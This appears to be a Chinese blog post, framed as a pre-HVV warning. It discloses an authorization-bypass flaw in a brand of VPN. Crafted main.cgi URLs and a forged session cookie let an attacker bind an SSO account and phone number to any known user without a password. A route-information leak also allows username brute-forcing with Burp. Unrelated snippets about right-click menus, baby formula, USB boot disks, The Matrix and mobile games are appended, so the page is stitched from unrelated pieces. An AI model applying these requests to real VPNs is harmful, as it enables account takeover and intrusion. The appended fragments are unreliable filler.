0x01 简述
HVV临近,现预警一个某捷VPN的信息泄露及越权绑定SSO账号及手机号的问题
注:需要知道存在的VPN用户,当然如果不知道的话,可以使用文章后面的那个 *** 进行用户名爆破
话不多说先上图
0x02 越权绑定
首先打开VPN登录页,可以看到是这样子的
直接构造URL:
https://1.1.1.1/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=USERNAME&sid=1614345312&oper=showres
USERNAME为已存在的用户名,访问后即可进入到这样一个界面
然后我们点击左侧的“个人设置”
在如上图功能这里,没有任何密码验证,可以直接给这个用户绑定SSO账号及手机号
0x03?信息泄露
直接构造URL:
https://1.1.1.1/cgi-bin/main.cgi?oper=getrsc
注:需要先使用之一步的方式构造URL进入到设置页面,否则没有Cookie,会提示“错误:当前用户不在线,请重新登录”,当然你也可以手动构造Cookie
Cookie: UserName=USERNAME; SessionId=1614345312; FirstVist=1; Skin=1; tunnel=1
然后再打开的页面,就可以看到他VPN现有的路由信息
同时,通过Burp抓包可以发现,如果用户名是正确的,这个页面才会返回路由信息
如果用户是不存在的,就不会返回
通过这个 *** ,可以使用Burp进行用户名爆破
文章来源微信公众号:NearSec
应用电脑上的盆友都了解程序安装多了,电脑鼠标鼠标右键菜单是愈来愈长,加上了一些乱七八糟的作用项,有很多全是用不到的。那样不但危害实际操作美观大方,更给客户实际操作产生了麻烦,有客户就了解了清除电脑...
. 很多妈妈们在一起都会有过交流带娃的经验。很多妈妈会发现这样的问题,吃了配方奶的孩子拉出来的大便特别臭。这是什么原因呢。下面小编就来和大家说一说。 喝了配方奶和母乳有什么不同 比起以牛奶为基底...
用一台一切正常的电脑制作U盘启动盘,随后应用U盘启动盘重做系统。开启装机软件,制做U盘启动盘逐渐制做,备份数据再制做,U盘启动盘制作取得成功,运行莱单中含有USB选择项并回车键,Win10 PE进到系...
本文目录一览: 1、黑客帝国和佛教有关系吗 2、《黑客帝国》的世界模式究竟是怎样子的? 3、《黑客帝国》里的佛教智慧,你看懂了吗 黑客帝国和佛教有关系吗 表面上好像有关系。都是讲“解脱”。但...
本文目录一览: 1、现在的游戏技术有多强?你最喜欢哪个游戏? 2、玩过和平精英如果真去到战场上会比普通人有优势吗? 3、pmgc是什么比赛 4、和平精英开科技怎么开? 5、和平精英是谁...
谢谢本站论坛网友“firelee”分享,更有有趣内容请接见本站论坛。 随着科技的生长,电子运动健身装备走进了普通人的生涯, 各种智能手环,智能跑鞋,智能手表层出不穷。 外国最大的XX网站p0~r...